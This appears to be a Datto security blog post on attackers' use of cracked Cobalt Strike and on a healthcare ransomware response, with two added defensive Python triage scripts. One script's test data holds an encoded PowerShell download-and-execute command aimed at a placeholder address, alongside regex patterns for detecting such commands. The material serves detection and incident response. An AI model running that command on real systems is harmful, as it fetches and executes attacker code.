February 09, 2022
Cobalt Strike: The New Favorite Among Thieves
Since 2012, Cobalt Strike has been utilised as a proactive way of testing network defenses against advanced threat actor tools, tactics, and procedures (TTPs). The aim, of course, is to mimic the most malicious threat actors and their techniques to test your security posture and practice response procedures. Unfortunately, like most things in security, tools and knowledge meant to help security teams can also be used maliciously by criminals.
Though this is debated in some circles, offensive security research and offensive simulation tools like Cobalt Strike, are in my opinion, a net positive for the security community. A tool like Cobalt Strike is simply simulating tactics and techniques already being used by hackers in the wild. Security teams need access to these tools in order to test against them.
Historically, penetration testing and simulation software had not been popular with competent cybercriminals because it was widely used and familiar to defenders — hackers usually relied on dark web exploit kits like Angler and Blackhole. This has flipped in recent years for two reasons:
- The availability of stable exploit kits on the dark web has reduced dramatically due to law enforcement actions against exploit kit authors.
- Cobalt Strike has gotten good; real good.
Cobalt Strike – The Swiss Army Hacker Framework
Over the last two years, malicious threat actors have managed to crack fully-featured versions of Cobalt Strike and made them widely available within dark web marketplaces and forums. For instance, on March 22nd, 2020, the latest version of the tool was cracked and provided to hackers. Datto has seen it widely used to infiltrate networks and move laterally through them; depending on the value placed on a given company’s data, ransomware is then dropped. Datto has noticed a consistent upward trend in the use of this cracked version as a primary tool by threat actors from early 2019 to the present.
Cobalt Strike is a favorite because it’s stable and highly flexible. It can be repurposed to deploy all manner of payloads, such as ransomware or a keylogger, to the compromised network. It’s well organised and provides a framework to manage compromised assets. Essentially, this tool helps the ‘B list’ act like ‘A list’ hackers.
While Cobalt Strike’s author has implemented many protections and licensing schemes to keep the code out of the wrong hands, the cracked versions appear to include the entire framework. This means that threat actors can gain access to a network, pivot, and then move laterally within it. Implants called “beacons” support this lateral movement from system to system without even connecting to the internet. Only one of these beacons (the “beachhead”) actually needs to connect to the internet, which makes the activity more difficult to detect at the network layer.
A feature called “Malleable C2” lets attackers modify the network signature of their traffic with relative ease, while Malleable PE gives the same stealthy flexibility to the implants that are injected into system processes.
Cobalt Strike also utilises modern staged delivery. Once within the network, numerous stages trigger in sequence as part of gaining access and executing the hacker’s final agenda: one stage triggers, then the next. What makes this difficult to detect is that each stage is simple and can even be a single line of code; alone, any one stage might not look malicious or raise any alarms. Even worse, by the time the final stage runs, the earlier stages have disappeared, leaving nothing on disk.
Lateral movement is a huge part of Cobalt Strike. The laterally communicating beacons enable the attacker to worm their way into more valuable parts of the network. The objective is often to find a domain administrator and take over their account. Using this account, they can instruct the domain controllers to stage ransomware throughout the entire network prior to execution — this technique gives almost no time for defenders to react once the final trigger is initiated.
We have observed that this methodology can take anywhere from a couple of hours to two full weeks from initial entry to the ransom demand.
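The beachhead pattern described above (one beacon egresses to the internet, the rest talk host to host) is something a defender can look for in flow logs. The following is an added example, not Datto's code or anything from Cobalt Strike itself: given flow records and one known-bad external address, it finds the internal hosts that spoke to that address, walks outbound connections on common lateral-movement ports from them (transitively, which goes a step beyond what the post describes), and scores how regular each beachhead's check-ins are. The flow format, every address, the port set and the regularity threshold are assumptions made for the example.

```python
"""Flow-log triage for a beachhead beacon and its lateral reach (added example)."""
from collections import defaultdict, deque
from ipaddress import ip_address, ip_network
import statistics
from typing import NamedTuple

# RFC 1918 ranges. ipaddress.is_private is deliberately not used because it
# also counts the documentation ranges used for the constructed sample below.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]
# Ports typically used for host-to-host movement: SMB, RPC/WMI, WinRM (assumed set).
LATERAL_PORTS = {445, 135, 5985, 5986}


class Flow(NamedTuple):
    ts: int      # epoch seconds
    src: str
    dst: str
    dport: int
    nbytes: int


def is_internal(addr: str) -> bool:
    ip = ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def parse_flow(line: str) -> Flow:
    """Constructed record format: '<epoch> <src> <dst> <dport> <bytes>'."""
    ts, src, dst, dport, nbytes = line.split()
    return Flow(int(ts), src, dst, int(dport), int(nbytes))


def find_beachheads(flows, c2_ip: str) -> set:
    """Internal hosts that spoke to the external address, i.e. egress beacons."""
    return {f.src for f in flows if f.dst == c2_ip and is_internal(f.src)}


def lateral_reach(flows, beachheads) -> dict:
    """Breadth-first walk over internal flows on lateral ports, starting from
    the beachheads. Returns host -> hop distance from the nearest beachhead;
    these hosts are the first candidates for memory triage."""
    edges = defaultdict(set)
    for f in flows:
        if (is_internal(f.src) and is_internal(f.dst)
                and f.dport in LATERAL_PORTS and f.src != f.dst):
            edges[f.src].add(f.dst)
    hops = {b: 0 for b in beachheads}
    queue = deque(sorted(beachheads))
    while queue:
        host = queue.popleft()
        for nxt in sorted(edges.get(host, ())):
            if nxt not in hops:
                hops[nxt] = hops[host] + 1
                queue.append(nxt)
    return hops


def beacon_regularity(flows, src: str, dst: str, min_samples: int = 4):
    """Coefficient of variation of check-in intervals: a low value suggests a
    fixed-period beacon. Malleable C2 profiles can add jitter, so treat this
    as a triage hint rather than proof. Returns None with too few samples."""
    ts = sorted(f.ts for f in flows if f.src == src and f.dst == dst)
    if len(ts) < min_samples:
        return None
    intervals = [b - a for a, b in zip(ts, ts[1:])]
    mean = float(statistics.mean(intervals))
    cv = statistics.pstdev(intervals) / mean if mean else 0.0
    return {"count": len(ts), "mean_interval": mean, "cv": cv, "regular": cv < 0.2}


# Constructed sample flows: 10.0.0.5 checks in every 60 s to the blocked
# address and then reaches three peers over SMB/WinRM; one peer goes a hop further.
SAMPLE_FLOWS = [
    "1644200000 10.0.0.5 203.0.113.10 443 1200",
    "1644200060 10.0.0.5 203.0.113.10 443 1180",
    "1644200120 10.0.0.5 203.0.113.10 443 1210",
    "1644200180 10.0.0.5 203.0.113.10 443 1195",
    "1644200240 10.0.0.5 203.0.113.10 443 1205",
    "1644200070 10.0.0.5 10.0.0.20 445 52000",
    "1644200075 10.0.0.5 10.0.0.21 445 51800",
    "1644200090 10.0.0.5 10.0.0.22 5985 8000",
    "1644200100 10.0.0.7 10.0.0.5 445 3000",       # inbound to the beachhead, not followed
    "1644200110 10.0.0.9 198.51.100.1 443 900",    # unrelated external traffic
    "1644200130 10.0.0.20 10.0.0.30 445 6000",     # second hop
]
C2_IP = "203.0.113.10"  # stands in for the blocked address; constructed value


def triage(lines=SAMPLE_FLOWS, c2_ip=C2_IP) -> dict:
    flows = [parse_flow(line) for line in lines]
    beachheads = find_beachheads(flows, c2_ip)
    return {
        "beachheads": sorted(beachheads),
        "reach": lateral_reach(flows, beachheads),
        "regularity": {b: beacon_regularity(flows, b, c2_ip) for b in sorted(beachheads)},
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(), indent=2))
```

On real data the input would be NetFlow, Zeek conn logs or firewall logs normalised to the same five fields; the hop distance is a prioritisation aid for which hosts to image or reboot first, not evidence of compromise on its own.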
Stopping a Ransom Before It’s Demanded
In a recent case, the Datto support team was engaged with a large healthcare provider that was investigating a strange alert. Their antivirus and other detection tools missed everything, but their application control luckily stopped one of the ransomware stages from executing something from a temp folder (this turned out to be the ransomware encryptor, which had been scheduled to kick off early on a Sunday morning). We investigated these alerts and triaged the network for any other signs of compromise. Within the first hour of deployment, we found:
- Memory-resident Cobalt Strike beacons on three of their critical servers
- Malicious PowerShell commands downloading additional malware from a Los Angeles IP address
- The compromised account was a user’s account that had been assigned overly permissive administrator privileges on the network
- The ransomware loader (technically a non-malicious file on its own) staged on thousands of workstations, servers, and medical devices.
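Several of the findings above are visible in ordinary process-creation telemetry if someone looks for them. The script below is an added example, not Datto's tooling: it runs a few triage rules over constructed process-creation records and flags PowerShell launched with an encoded or download-cradle command line, downloads from a non-RFC 1918 address, binaries executed from a temp folder, and scheduled tasks whose action lives in a temp folder. The record format, host names, user names, file paths, the sample encoded command and every address are constructed for the example, and the rule set and thresholds are assumptions.

```python
"""Process-creation log triage for the indicators in the findings (added example)."""
import base64
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# RFC 1918 only; ipaddress.is_private would also treat the documentation
# range used in the sample as internal.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)
URL_IP = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def is_internal(addr: str) -> bool:
    ip = ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_event(line: str) -> dict:
    """Constructed record format: '<ts>|<host>|<user>|<image path>|<command line>'."""
    ts, host, user, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "image": image, "cmdline": cmdline}


def check_event(ev: dict) -> list:
    hits = []
    image = ev["image"].lower()
    cmd = ev["cmdline"]
    text = cmd  # command line plus any decoded payload, for keyword checks
    if any(d in image for d in TEMP_DIRS):
        hits.append(("exec_from_temp", ev["image"]))
    if "powershell" in image:
        decoded = decode_encoded_command(cmd)
        if decoded:
            hits.append(("encoded_powershell", decoded))
            text = cmd + " " + decoded
        cradle = CRADLE.search(text)
        if cradle:
            hits.append(("download_cradle", cradle.group(0)))
    for ip in URL_IP.findall(text):
        if not is_internal(ip):
            hits.append(("external_download", ip))
    if (image.endswith("schtasks.exe") and "/create" in cmd.lower()
            and any(d in cmd.lower() for d in TEMP_DIRS)):
        hits.append(("scheduled_task_from_temp", cmd))
    return [{"host": ev["host"], "ts": ev["ts"], "rule": r, "detail": d} for r, d in hits]


def triage_events(lines) -> list:
    findings = []
    for line in lines:
        findings.extend(check_event(parse_event(line)))
    return findings


def hosts_by_rule(findings) -> dict:
    out = defaultdict(set)
    for f in findings:
        out[f["rule"]].add(f["host"])
    return {rule: sorted(hosts) for rule, hosts in out.items()}


# Constructed sample: the encoded command is built here so the fixture stays readable.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    rf"2022-02-06T02:55:10|SRV-FILE01|CORP\jdoe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc {_ENCODED}",
    r"2022-02-06T02:56:42|WS-1044|CORP\jdoe|C:\Windows\System32\schtasks.exe|schtasks /create /tn Update /tr C:\Windows\Temp\upd.exe /sc once /st 03:00",
    r"2022-02-06T03:00:01|WS-1044|NT AUTHORITY\SYSTEM|C:\Windows\Temp\upd.exe|C:\Windows\Temp\upd.exe",
    r"2022-02-06T09:12:33|WS-2001|CORP\asmith|C:\Program Files\Vendor\app.exe|app.exe --update",
]

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']:<11} {f['rule']:<25} {f['detail'][:60]}")
```

The same rules map onto Windows Security event 4688 (with command-line auditing enabled) or Sysmon event 1; the point of decoding the encoded command before matching is that the cradle keywords are otherwise invisible in the raw log line, which is how the first finding in the list above slips past string-based alerting.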
Based on the scoping of the incident using triage data and conclusions, our support team recommended immediate action to purge the malicious actor from the network:
- The IP address found by Datto was blocked at the firewall
- The compromised user’s account was disabled
- The servers infected with Cobalt Strike beacons were rebooted to clear their memory footprint, and validation scans were performed to ensure no persistence remained. (Datto has a button for this)
- We removed the ransomware loaders and other artifacts from every system in the network
- All domain admins underwent password resets
- Following these initial containment actions, the organisation retained a Datto partner to take over the full investigation and remaining cleanup actions.
These swift actions by the organisation’s IT and security teams, supported by Datto, purged the actor, stopped further Cobalt Strike spread, and prevented an in-progress second attempt to lock out and ransom this critical healthcare provider. These actions, from triage to containment, happened within the same evening. Without a detection and response capability and support, it could have been a very different story.
Initial Response Support Is Most Critical
Most organisations spend a majority of their time and resources putting controls and protections in place to prevent these attacks from ever occurring. When such controls fail, detection and response expertise and capabilities are essential in the FIRST HOUR if you plan to mitigate an attack like this healthcare provider did. Too often we see organisations stumble in the first hour due to not understanding the scope and severity of an attack (lack of visibility) and not knowing what needs to get done first (lack of response experience and practice).
Based on the tactics and methodology we’ve observed in the latest ransomware cases, we recommend that if your team encounters ransomware, the remediation and response shouldn’t stop at the ransomware. It is very likely that beacons your tools missed are still hiding in memory somewhere on your network. Even if your endpoint protection stops the ransom, the perpetrator could still be inside with access to try again. Fully triaging and scoping an incident is essential to containment: you’ll need a partner like Datto and a team to support your effort to ensure that all of the malicious code is remediated.